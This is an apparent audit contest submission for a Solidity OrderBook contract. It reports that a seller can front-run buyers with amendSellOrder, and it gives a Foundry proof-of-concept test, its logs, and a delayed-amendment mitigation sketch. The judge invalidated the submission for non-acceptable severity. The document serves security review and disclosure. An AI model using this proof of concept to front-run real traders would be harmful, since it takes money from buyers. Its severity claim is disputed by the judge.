OrderBook

First Flight #43
Beginner Friendly, Solidity
100 EXP
Submission Details
Impact: high
Likelihood: high
Invalid

H-05 Seller Front-running with `amendSellOrder` leads to unfair trading for buyers

Root + Impact

Description

Because `amendSellOrder` enforces no modification interval, a seller can front-run a buyer by amending the sell order, increasing the price or reducing the amount, before the order is purchased. This leads to unfair trading for buyers.

```solidity
function amendSellOrder(
    uint256 _orderId,
    uint256 _newAmountToSell,
    uint256 _newPriceInUSDC,
    uint256 _newDeadlineDuration
) public {
    // ... (rest of the function body is not shown in this excerpt)

    // Update order details: the new terms apply immediately
    order.amountToSell = _newAmountToSell;
    order.priceInUSDC = _newPriceInUSDC;
    order.deadlineTimestamp = newDeadlineTimestamp;
}
```

Risk

Likelihood:

  • Reason 1: The seller can suddenly increase _newPriceInUSDC before the order is purchased.

Impact:

  • Impact 1: The buyer ends up paying more in protocol fees (protocolFee) and the actual payment (sellerReceives).

Proof of Concept

A malicious seller can front-run the buyer's purchase by calling `amendSellOrder` to increase `priceInUSDC`. The higher price also increases `protocolFee` and `sellerReceives`, causing the buyer to pay higher fees than originally intended.

```solidity
function test_front_run() public {
    // alice creates sell order for wbtc
    vm.startPrank(alice);
    wbtc.approve(address(book), 2e8);
    uint256 aliceId = book.createSellOrder(address(wbtc), 2e8, 1e6, 3 days);
    string memory aliceOrderDetails_1 = book.getOrderDetailsString(aliceId);
    console2.log(aliceOrderDetails_1);
    vm.stopPrank();

    // two days later alice amends the order: less wBTC, higher USDC price
    vm.warp(block.timestamp + 2 days);
    vm.prank(alice);
    book.amendSellOrder(aliceId, 1.75e8, 175_000e6, 3 days);
    string memory aliceOrderDetails_2 = book.getOrderDetailsString(aliceId);
    console2.log(aliceOrderDetails_2);

    // dan's purchase executes against the amended terms
    vm.startPrank(dan);
    usdc.approve(address(book), 200_000e6);
    book.buyOrder(aliceId); // dan buys alice wbtc order
    string memory aliceOrderDetails_3 = book.getOrderDetailsString(aliceId);
    console2.log(aliceOrderDetails_3);
    vm.stopPrank();
}
```

Output

  1. The buyer originally only needed to pay protocolFee 30000 and sellerReceives 970000.

  2. Now, the buyer needs to pay much higher fees: protocolFee 5250000000 and sellerReceives 169750000000.

```
[PASS] test_front_run() (gas: 432069)
Logs:
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 200000000 wBTC
Asking Price: 1000000 USDC
Deadline Timestamp: 259201
Status: Active
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 175000000 wBTC
Asking Price: 175000000000 USDC
Deadline Timestamp: 432001
Status: Active
@> protocolFee 5250000000
@> sellerReceives 169750000000
BuyOrder totalFees: 5250000000
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 175000000 wBTC
Asking Price: 175000000000 USDC
Deadline Timestamp: 432001
Status: Inactive (Filled/Cancelled)
```

Recommended Mitigation

Add a modification time interval to amendSellOrder so that the sell order cannot be amended before a trade is completed.
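
One way the recommended modification interval could be implemented, as an added sketch that is not the OrderBook contract's code or the submitter's: amended terms are queued and only take effect after a delay. The names `DelayedAmendBook`, `AMEND_DELAY`, `Terms`, `getOrder` and `_promote`, and the one-hour value, are assumptions; token transfers and fee handling are omitted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added illustration (hypothetical contract, not the audited OrderBook): amendments
// are queued and apply only after AMEND_DELAY. Token transfers and fees are omitted.
contract DelayedAmendBook {
    uint256 public constant AMEND_DELAY = 1 hours; // assumed value
    struct Terms { uint256 amountToSell; uint256 priceInUSDC; uint256 deadlineTimestamp; }
    struct Order {
        address seller;
        bool isActive;
        Terms live;          // terms a fill executes at
        Terms pending;       // queued amendment
        uint256 effectiveAt; // when pending replaces live; 0 = nothing queued
    }
    mapping(uint256 => Order) private orders;
    uint256 private nextId = 1;

    function createSellOrder(uint256 amount, uint256 price, uint256 duration) external returns (uint256 id) {
        id = nextId++;
        orders[id].seller = msg.sender;
        orders[id].isActive = true;
        orders[id].live = Terms(amount, price, block.timestamp + duration);
    }

    function amendSellOrder(uint256 id, uint256 amount, uint256 price, uint256 duration) external {
        Order storage o = orders[id];
        require(msg.sender == o.seller && o.isActive, "not amendable");
        _promote(o); // settle an earlier, matured amendment before queuing a new one
        o.pending = Terms(amount, price, block.timestamp + duration);
        o.effectiveAt = block.timestamp + AMEND_DELAY;
    }

    function buyOrder(uint256 id) external returns (uint256 pricePaid) {
        Order storage o = orders[id];
        require(o.isActive, "inactive");
        _promote(o);
        require(block.timestamp < o.live.deadlineTimestamp, "expired");
        o.isActive = false;
        pricePaid = o.live.priceInUSDC; // a real book would move USDC and the token here
    }

    // Shows live terms and any queued change; past effectiveAt, `pending` is what a fill uses.
    function getOrder(uint256 id) external view returns (Order memory) { return orders[id]; }

    function _promote(Order storage o) private {
        if (o.effectiveAt == 0 || block.timestamp < o.effectiveAt) return;
        o.live = o.pending;
        o.effectiveAt = 0;
    }
}
```

A buy transaction mined after `effectiveAt` still fills at the amended terms, so the delay gives buyers notice of a change rather than a price guarantee.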

Updates

Lead Judging Commences

yeahchibyke Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity

Appeal created

0x996 Submitter
10 months ago
yeahchibyke Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
